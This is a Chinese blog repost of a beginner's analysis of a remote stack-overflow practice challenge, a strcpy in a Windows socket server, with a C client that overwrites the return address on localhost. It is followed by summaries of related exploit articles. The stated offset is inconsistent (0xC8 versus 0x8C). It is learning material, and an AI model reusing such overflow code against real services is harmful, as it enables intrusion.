一个简单的远程溢出漏洞分析

最新推荐文章于 2023-03-10 11:50:07 发布
最新推荐文章于 2023-03-10 11:50:07 发布
阅读量204 收藏 1
点赞数
CC 4.0 BY-SA版权
文章标签: php
原文链接:http://www.cnblogs.com/Ox9A82/p/5260364.html
本文分析了一款Windows程序中的远程溢出漏洞,通过详细跟踪程序流程和使用调试工具,确定了漏洞产生的原因在于一个未正确处理边界条件的strcpy函数调用,最终通过构造特定的shellcode成功实现了返回地址的覆盖。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

这是看雪Exploit me的题目,本来以为会很难,结果还是很基础的,适合我这样的新手练手。

http://bbs.pediy.com/showthread.php?t=56998

进入正题

首先拿到了一个Windows程序,拖到IDA里打算看一下,结果发现程序逻辑出乎意料的简单。就是一个很常规的SOCKET流程带有一些错误处理。

下面详细说明。

mov ebp,eax

test ebp,ebp

很明显是对socket函数进行错误处理

同样是错误处理,判断accept函数是否执行成功

 

这里就是关键了,因为下面就结束连接了,问题肯定出在这里

跟进这个call

发现这里有复制的行为,F5看一下,原来是个strcpy

同时发现个好玩的地方,这个函数没有建立栈帧,这个函数的确是call进来的不是jmp进来的。

然而却没有栈帧。是通过对esp操作来开辟栈空间和指明返回地址的。

那么这里就可以猜到0xC8就是局部变量距离返回地址的大小。

接下来用OD进行调试。

在RET上下断点,可以得到这样。

分析栈可知,确实是我们上面猜的那样,就是0x8C的大小。

写了一个简单的socket用来发送shellcode

 1 // EXP.cpp : 定义控制台应用程序的入口点。
 2 //
 3 
 4 #include <winsock2.h>
 5 #include "stdafx.h"
 6 #include "windows.h"
 7 #pragma comment(lib, "Ws2_32.lib ")
 8 char shellcode[] =
 9 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
10 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
11 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
12 "AAAAAAAAAAAAAAAAAAAAAA\xCC\xDD\xEE\xFF";
13 int main()
14 {
15     SOCKET MySocket;
16     WSADATA OUTDATA;
17     WSAStartup(MAKEWORD(2, 2), &OUTDATA);
18     MySocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
19     sockaddr_in SocketInfo;
20     SocketInfo.sin_family = AF_INET;
21     SocketInfo.sin_addr.S_un.S_addr = inet_addr("127.0.0.1");
22     SocketInfo.sin_port = htons(7777);//7777端口通过对目标的bind的函数分析可以得出
23     if (connect(MySocket,(sockaddr *)&SocketInfo,sizeof(SocketInfo))
24         ==SOCKET_ERROR)
25     {
26         MessageBox(NULL, L"error", L"error", 0);
27     }
28     send(MySocket, shellcode, sizeof(shellcode), 0);
29     return 0;
30 }

结果如下

返回地址被成功覆盖!

本来应该写出shellcode的但是因为不会写。。所以,以后再补全吧,待我再研究研究。

漏洞到这里就已经分析清楚了,就是一个简单的strcpy导致的远程溢出漏洞。

转载于:https://www.cnblogs.com/Ox9A82/p/5260364.html

网络安全远程缓冲区溢出实验
SmallBillows的博客
06-14 1781
网络安全远程缓冲区溢出实验目录编写CS架构(Server将Client的请求反转并发回)关闭地址随机化ASLR编译 Server 时关闭堆栈不可执行和数据溢出保护编译 Clientgdb 动态调试 Server 获取溢出点的信息PayLoad的构造ShellCode的构造GDB调试内存地址与实际运行地址不一致问题实验成果展示 目录 编写CS架构(Server将Client的请求反转并发回) //Server.c #include <sys/types.h> #include <sys/so
通过一个远程溢出漏洞实现开后门的操作
weixin_44045581的博客
03-22 1195
通过一个远程溢出漏洞实现开后门的操作PCManFTP v2.0(CVE-2013-4730)漏洞分析1. 软件简介2. 漏洞成因3. 利用过程4.PoC PCManFTP v2.0(CVE-2013-4730)漏洞分析 软件名称:PCManFTP 软件版本:2.0 漏洞模块:PCManFTPD2.exe 模块版本:2.0.0.0 编译日期:2005-01-01 操作系统:Windows 7 漏洞编...
一次简单的xss漏洞分析【原创】
weixin_30535167的博客
03-27 172
作者:风之传说 起因,经过扫描,发现了一个反射型xss的漏洞: 那么,我想,既然存在xss漏洞。如果没有防火墙肯定是直接就利用了,直接插入<img src=x onerror=alert(0)>: 可以看到,漏洞并未被触发,在这里非常奇怪。按道理来说,应该是直接输出我们的语句才对,因为都输出到页面了。我们右边查看源代码: 然后发现第一个输出点被转义了。很奇怪,为什么...
一个简单溢出例子
hityct1的专栏
02-07 1193
使用c6.0#include "stdafx.h"#include ; void overFlow () { int a[] = { 0x78787868 }; *(a + 2) += 7; } int main () { int aa = 3; overFlow (); aa = 4; printf ("%d/n", aa);
软件漏洞分析入门
热门推荐
whatday的专栏
09-23 1万+
1 引子 To be the apostrophe which changed “Impossible” into “I’m possible” —— failwest 凉风有讯,秋月无边。 您是否梦想过能够像电影上演的那样黑进任意一台机器远程操控?您的梦想是否曾经被书店里边满架子的反黑,防毒,擒木马的扫盲书强暴的体无完肤? 从今天开始,准备陆续发一系列关于软件漏洞方面基础知识的帖子,包括软件漏洞...
linux远程溢出,OpenSSH SFTP远程溢出漏洞
weixin_29669143的博客
05-06 532
安全社区爱好者Jann Horn公布了OpenSSH可以让用SFTP访问的用户在没有验证的情况下使用"ForceCommand internal-sftp"的漏洞(含POC),也就是说如果你的OpenSSH服务器中没有配置"ChrootDirectory"的话普通用户都可以访问所有文件系统的资源,包括/proc,在>=2.6.x的Linux内核上,/proc/self/maps会显示你的内存...
远程溢出漏洞利用程序
06-08
远程溢出漏洞利用程序是一种黑客工具,主要用于针对网络上的目标系统进行攻击。它利用软件中的安全漏洞,尤其是那些可能导致远程代码执行的漏洞,使得攻击者能够在目标机器上执行任意代码,从而获取对系统的控制权。...
IBM HTTP Server 远程溢出漏洞
01-08
涉及程序: GET 描述: 通过提交超长的GET请求导致IBM HTTP Server远程溢出 详细: IBM 的 HTTP 服务器是一个 web 服务器。在 Windows NT 使用的版本中存在拒绝服务的漏洞。如果提交一个超过219个字符的 GET 请求,...
远程缓冲区溢出漏洞利用程序
08-03
远程缓冲区溢出漏洞利用程序 在这篇文章中,我们将讨论如何编写远程缓冲区溢出漏洞利用程序。...这个漏洞利用程序可以帮助我们更好地理解缓冲区溢出漏洞,并且为我们提供了一个学习漏洞利用的机会。
远程溢出漏洞.txt
12-31
远程溢出漏洞.tx
linux远程溢出漏洞,【高危】漏洞预警 | Linux Systemd存在高危远程溢出漏洞(CVE-2017-9445)...
weixin_30387211的博客
05-10 298
原标题:【高危】漏洞预警 | Linux Systemd存在高危远程溢出漏洞(CVE-2017-9445)systemd是Linux下的init软件,主要用于减少系统引导时间和计算开销。systemd 的systemd-resolved服务用于处理DNS请求并为本地应用提供域名解析。该服务的dns_packet_new函数中存在缓冲区溢出漏洞,“页对齐数 - sizeof(DnsPacket) +...
【转载】利用一个溢出漏洞实现 VMware 虚拟机逃逸
weixin_30835933的博客
07-20 170
1. 介绍 2017年3月,长亭安全研究实验室(Chaitin Security Research Lab)参加了 Pwn2Own 黑客大赛,我作为团队的一员,一直专注于 VMware Workstation Pro 的破解,并成功在赛前完成了一个虚拟机逃逸的漏洞利用。(很不)幸运的是,就在 Pwn2Own 比赛的前一天(3月14日),VMware 发布了一个新的版本,其中修复了我们所利用的漏洞...
远程溢出实验
qq_43717119的博客
06-22 2067
远程溢出 【实验目的】 1、掌握远程溢出的基本原理; 2、掌握实现远程溢出的基本手段。 【实验环境】 同学A:运行server.exe 同学B:运行exploit.exe(命令格式:exploit.exe ipaddress 8888) 备注:同学A、B分别登录windows靶机,运行程序在D盘->攻防工具包->远程溢出 【实验预备知识点】 远程缓冲区溢出原理和本地缓冲区溢出原理一样,不同之处在于远程缓冲区溢出需要利用套接口进行远程连接。本小节通过一个例子来分析远程缓冲区溢出的工作原理和攻击过程
最新远程溢出漏洞
jahn的专栏
10-28 1307
#!/usr/bin/perl## *# * C@@@@@ O@@@@@@@ C@@@@@ O@@@@@@O C@@@@@@@@@o # * C@@@@@@@@@@@@@@@@O
windows下Socket链接溢出
acy29712的博客
01-06 368
最近在windows下使用通过多线程使用jdbc操作数据库,在线程数设置为5,并且每个线程执行完成后Sleep(1000),在这种情况下,竟然还会报错: java.net.SocketException No buffer space available (maximum connections reached) JVM_Bind 一看这个错误类型,应该是属于Socket连接没有关闭...
远程堆栈溢出 实战篇
|游梦空间|
11-22 716
下面是一个有问题的internet服务程序: /****************************************************************************/ /* server.cpp By Ipxodi */ #include #include char Buff[1024]; void overflow(char * s,int size) {
(墨者学院)-主机溢出提权漏洞分析
qq_52074678的博客
12-11 3265
需要的小知识大纲 1、掌握文件上传的技巧; 2、掌握IIS中间件存在的畸形解析漏洞; 3、了解Windows系统CMD命令执行; 4、了解查看操作系统安全补丁情况; 5、了解Windows操作系统的文件权限设置; 6、了解操作系统的溢出漏洞的提权方式; 小知识 具体流程 1. ...
网安学习日记-MS08-067远程溢出漏洞学习(CVE-2008-4250)
末班车的博客
03-10 935
MS08-067远程代码执行漏洞详细利用过程与发现思路
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值